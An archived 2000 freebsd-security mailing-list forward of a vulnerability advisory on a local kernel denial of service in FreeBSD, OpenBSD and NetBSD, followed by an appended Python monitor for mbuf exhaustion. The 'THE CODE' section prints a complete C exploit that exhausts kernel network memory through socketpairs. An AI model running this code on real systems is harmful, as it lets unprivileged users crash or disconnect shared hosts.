From owner-freebsd-security Tue May 30 1:40:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from Athena.za.net (athena.za.net [196.30.167.200]) by hub.freebsd.org (Postfix) with ESMTP id D125837B90B for ; Tue, 30 May 2000 01:40:40 -0700 (PDT) (envelope-from jus@security.za.net)
Received: from localhost (jus@localhost) by Athena.za.net (8.9.3/8.9.3) with ESMTP id KAA00271 for ; Tue, 30 May 2000 10:39:51 +0200 (SAST) (envelope-from jus@security.za.net)
X-Authentication-Warning: Athena.za.net: jus owned process doing -bs
Date: Tue, 30 May 2000 10:39:51 +0200 (SAST)
From: Justin Stanford
X-Sender: jus@Athena.za.net
To: freebsd-security@freebsd.org
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tested as well on 3.4-STABLE and 4.0-STABLE - it works.

--
Justin Stanford
082 7402741
jus@security.za.net
www.security.za.net
IT Security and Solutions

---------- Forwarded message ----------
Date: Mon, 29 May 2000 09:05:23 -0500 (CDT)
From: Vacuum
To: news@technotronic.com
Subject: Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability

Local FreeBSD, OpenBSD, NetBSD, DoS Vulnerability

Release Date: April 29, 2000

Systems Affected:
  FreeBSD 3.3-RELEASE
  FreeBSD 4.0-RELEASE
  FreeBSD 5.0 (maybe)
  OpenBSD 2.5
  OpenBSD 2.6
  OpenBSD 2.7 (maybe)
  NetBSD 1.4.1
  NetBSD 1.4.2 (maybe)

THE PROBLEM

From an original posting made about last September by Sven Berkenvs (sven@ILSE.NL) to bugtraq:

--- Forward ---
I stumbled across a denial of service attack on FreeBSD systems, where an unprivileged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions.

OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD.
--- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still works.

FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs receives
    /kernel: xl0: no memory for rx list -- packet dropped!
  All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
OpenBSD - 2.5 (with NMBCLUSTERS=8192): mb_map full
OpenBSD - 2.6 (with patches up to May 25, 2000): mb_map full
OpenBSD - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS
  The network connection is dead.
NetBSD - 1.4.2: Untested

From what I have tested on, Linux does not have any issue with this piece of code. As for the other unices, they have not been tested.

THE CODE

The original code written by Sven Berkenvs that causes this (the header names were lost in the archive's rendering; the headers the code needs are restored here):

  #include <sys/types.h>
  #include <sys/socket.h>
  #include <fcntl.h>
  #include <unistd.h>   /* write() */
  #include <stdlib.h>   /* exit() */

  #define BUFFERSIZE 204800

  extern int main(void)
  {
      int p[2], i;
      char crap[BUFFERSIZE];

      /* Keep creating socket pairs until the kernel refuses; each pair is
       * given oversized send/receive buffers and then filled without
       * ever being read, so the data stays pinned in kernel mbufs. */
      while (1) {
          if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
              break;
          i = BUFFERSIZE;
          setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
          setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
          setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
          setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
          fcntl(p[0], F_SETFL, O_NONBLOCK);
          fcntl(p[1], F_SETFL, O_NONBLOCK);
          write(p[0], crap, BUFFERSIZE);
          write(p[1], crap, BUFFERSIZE);
      }
      exit(0);
  }

Underground Security Systems Research
http://www.ussrback.com

Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f, Technotronic and Rfp.

Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

Feedback: Please send suggestions, updates, and comments to:
Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com

------------ Output from pgp ------------
Opening file "/dev/null" type text.
Opening file "/home/jus/pgp4pine.tmp" type binary.
Signature by unknown keyid: 0x8D8FA0C3
Opening file "/dev/null" type text.

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
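A defender-side monitor for the symptom the advisory describes, added here as an example and not part of the forwarded post: it parses FreeBSD-style `netstat -m` output to measure mbuf cluster use against the NMBCLUSTERS limit, and scans syslog for the three kernel messages quoted above. The `netstat -m` and syslog samples are constructed to resemble FreeBSD 4.x output and are not captured from a real host.

```python
import re

# Constructed sample resembling FreeBSD 4.x `netstat -m` output (not captured
# from a real host); the cluster pool is almost exhausted.
SAMPLE_NETSTAT_M = """\
2011/2064/6656 mbufs in use (current/peak/max):
        2011 mbufs allocated to data
1650/1660/1664 mbuf clusters in use (current/peak/max)
3816 Kbytes allocated to network (99% of mb_map in use)
37 requests for memory denied
0 requests for memory delayed
0 calls to protocol drain routines
"""
# Constructed syslog excerpt carrying the kernel messages quoted in the advisory.
SAMPLE_SYSLOG = """\
May 30 10:12:01 host /kernel: xl0: no memory for rx list -- packet dropped!
May 30 10:12:03 host sshd[212]: Accepted password for alice from 10.0.0.5
May 30 10:12:07 host /bsd: mb_map full
May 30 10:12:09 host /netbsd: WARNING: mclpool limit reached; increase NMBCLUSTERS
"""
# Kernel messages the advisory reports for each affected system.
EXHAUSTION_SIGNATURES = (
    "mb_map full",            # OpenBSD
    "no memory for rx list",  # FreeBSD 4.x (xl0 driver)
    "mclpool limit reached",  # NetBSD
)
_CLUSTERS_RE = re.compile(r"^\s*(\d+)/(\d+)/(\d+) mbuf clusters in use", re.M)
_DENIED_RE = re.compile(r"^\s*(\d+) requests for memory denied", re.M)

def mbuf_cluster_pressure(netstat_output, threshold=0.90):
    """Parse `netstat -m` text and flag when clusters in use approach the
    NMBCLUSTERS limit or the kernel has already denied allocations."""
    m = _CLUSTERS_RE.search(netstat_output)
    if m is None:
        raise ValueError("no 'mbuf clusters in use' line found")
    current, peak, limit = (int(x) for x in m.groups())
    d = _DENIED_RE.search(netstat_output)
    denied = int(d.group(1)) if d else 0
    ratio = current / limit if limit else 0.0
    return {"current": current, "peak": peak, "limit": limit,
            "ratio": round(ratio, 3), "denied": denied,
            "alarm": ratio >= threshold or denied > 0}

def exhaustion_events(syslog_text):
    """Return syslog lines matching the advisory's mbuf-exhaustion messages."""
    return [line for line in syslog_text.splitlines()
            if any(sig in line for sig in EXHAUSTION_SIGNATURES)]
```

A non-zero "requests for memory denied" count is treated as an alarm on its own, since by then the kernel has already started refusing allocations.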